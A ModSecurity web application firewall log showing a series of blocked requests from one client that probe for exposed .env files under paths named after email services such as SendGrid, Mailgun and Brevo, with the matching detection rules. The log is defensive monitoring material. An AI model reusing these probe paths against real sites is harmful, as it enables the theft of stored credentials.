[Mon May 11 15:50:18.671057 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/notify/.env"] [unique_id "agHemqt2WtvoFr7xvGzc9QAAAIk"]
[Mon May 11 15:50:18.671562 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/notify/.env"] [unique_id "agHemqt2WtvoFr7xvGzc9QAAAIk"]
[Mon May 11 15:50:18.671790 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/notify/.env"] [unique_id "agHemqt2WtvoFr7xvGzc9QAAAIk"]
[Mon May 11 15:50:18.764473 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sender/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/sender/.env"] [unique_id "agHemqt2WtvoFr7xvGzc9gAAAIk"]
[Mon May 11 15:50:18.764884 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/sender/.env"] [unique_id "agHemqt2WtvoFr7xvGzc9gAAAIk"]
[Mon May 11 15:50:18.765091 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/sender/.env"] [unique_id "agHemqt2WtvoFr7xvGzc9gAAAIk"]
[Mon May 11 15:50:18.856540 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /campaign/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/campaign/.env"] [unique_id "agHemqt2WtvoFr7xvGzc9wAAAIk"]
[Mon May 11 15:50:18.856927 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/campaign/.env"] [unique_id "agHemqt2WtvoFr7xvGzc9wAAAIk"]
[Mon May 11 15:50:18.857124 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/campaign/.env"] [unique_id "agHemqt2WtvoFr7xvGzc9wAAAIk"]
[Mon May 11 15:50:18.950322 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /newsletter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/newsletter/.env"] [unique_id "agHemqt2WtvoFr7xvGzc-AAAAIk"]
[Mon May 11 15:50:18.950795 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/newsletter/.env"] [unique_id "agHemqt2WtvoFr7xvGzc-AAAAIk"]
[Mon May 11 15:50:18.951024 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/newsletter/.env"] [unique_id "agHemqt2WtvoFr7xvGzc-AAAAIk"]
[Mon May 11 15:50:19.042977 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ses/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/ses/.env"] [unique_id "agHem6t2WtvoFr7xvGzc-QAAAIk"]
[Mon May 11 15:50:19.043384 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/ses/.env"] [unique_id "agHem6t2WtvoFr7xvGzc-QAAAIk"]
[Mon May 11 15:50:19.043589 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/ses/.env"] [unique_id "agHem6t2WtvoFr7xvGzc-QAAAIk"]
[Mon May 11 15:50:19.135076 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sendgrid/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/sendgrid/.env"] [unique_id "agHem6t2WtvoFr7xvGzc-gAAAIk"]
[Mon May 11 15:50:19.135492 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/sendgrid/.env"] [unique_id "agHem6t2WtvoFr7xvGzc-gAAAIk"]
[Mon May 11 15:50:19.135705 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/sendgrid/.env"] [unique_id "agHem6t2WtvoFr7xvGzc-gAAAIk"]
[Mon May 11 15:50:19.228059 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sparkpost/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/sparkpost/.env"] [unique_id "agHem6t2WtvoFr7xvGzc_AAAAIk"]
[Mon May 11 15:50:19.228590 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/sparkpost/.env"] [unique_id "agHem6t2WtvoFr7xvGzc_AAAAIk"]
[Mon May 11 15:50:19.228859 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/sparkpost/.env"] [unique_id "agHem6t2WtvoFr7xvGzc_AAAAIk"]
[Mon May 11 15:50:19.320500 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postmark/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/postmark/.env"] [unique_id "agHem6t2WtvoFr7xvGzc_QAAAIk"]
[Mon May 11 15:50:19.320854 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/postmark/.env"] [unique_id "agHem6t2WtvoFr7xvGzc_QAAAIk"]
[Mon May 11 15:50:19.321046 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/postmark/.env"] [unique_id "agHem6t2WtvoFr7xvGzc_QAAAIk"]
[Mon May 11 15:50:19.412906 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailgun/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mailgun/.env"] [unique_id "agHem6t2WtvoFr7xvGzc_gAAAIk"]
[Mon May 11 15:50:19.413287 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mailgun/.env"] [unique_id "agHem6t2WtvoFr7xvGzc_gAAAIk"]
[Mon May 11 15:50:19.413482 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mailgun/.env"] [unique_id "agHem6t2WtvoFr7xvGzc_gAAAIk"]
[Mon May 11 15:50:19.506374 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mandrill/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mandrill/.env"] [unique_id "agHem6t2WtvoFr7xvGzc_wAAAIk"]
[Mon May 11 15:50:19.506760 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mandrill/.env"] [unique_id "agHem6t2WtvoFr7xvGzc_wAAAIk"]
[Mon May 11 15:50:19.506970 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mandrill/.env"] [unique_id "agHem6t2WtvoFr7xvGzc_wAAAIk"]
[Mon May 11 15:50:19.599108 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailjet/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mailjet/.env"] [unique_id "agHem6t2WtvoFr7xvGzdAAAAAIk"]
[Mon May 11 15:50:19.599499 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mailjet/.env"] [unique_id "agHem6t2WtvoFr7xvGzdAAAAAIk"]
[Mon May 11 15:50:19.599701 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mailjet/.env"] [unique_id "agHem6t2WtvoFr7xvGzdAAAAAIk"]
[Mon May 11 15:50:19.691041 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /brevo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/brevo/.env"] [unique_id "agHem6t2WtvoFr7xvGzdAQAAAIk"]
[Mon May 11 15:50:19.691457 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/brevo/.env"] [unique_id "agHem6t2WtvoFr7xvGzdAQAAAIk"]
[Mon May 11 15:50:19.691663 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/brevo/.env"] [unique_id "agHem6t2WtvoFr7xvGzdAQAAAIk"]
[Mon May 11 15:50:19.784413 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /transactional/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/transactional/.env"] [unique_id "agHem6t2WtvoFr7xvGzdAgAAAIk"]
[Mon May 11 15:50:19.784838 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/transactional/.env"] [unique_id "agHem6t2WtvoFr7xvGzdAgAAAIk"]
[Mon May 11 15:50:19.785065 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/transactional/.env"] [unique_id "agHem6t2WtvoFr7xvGzdAgAAAIk"]
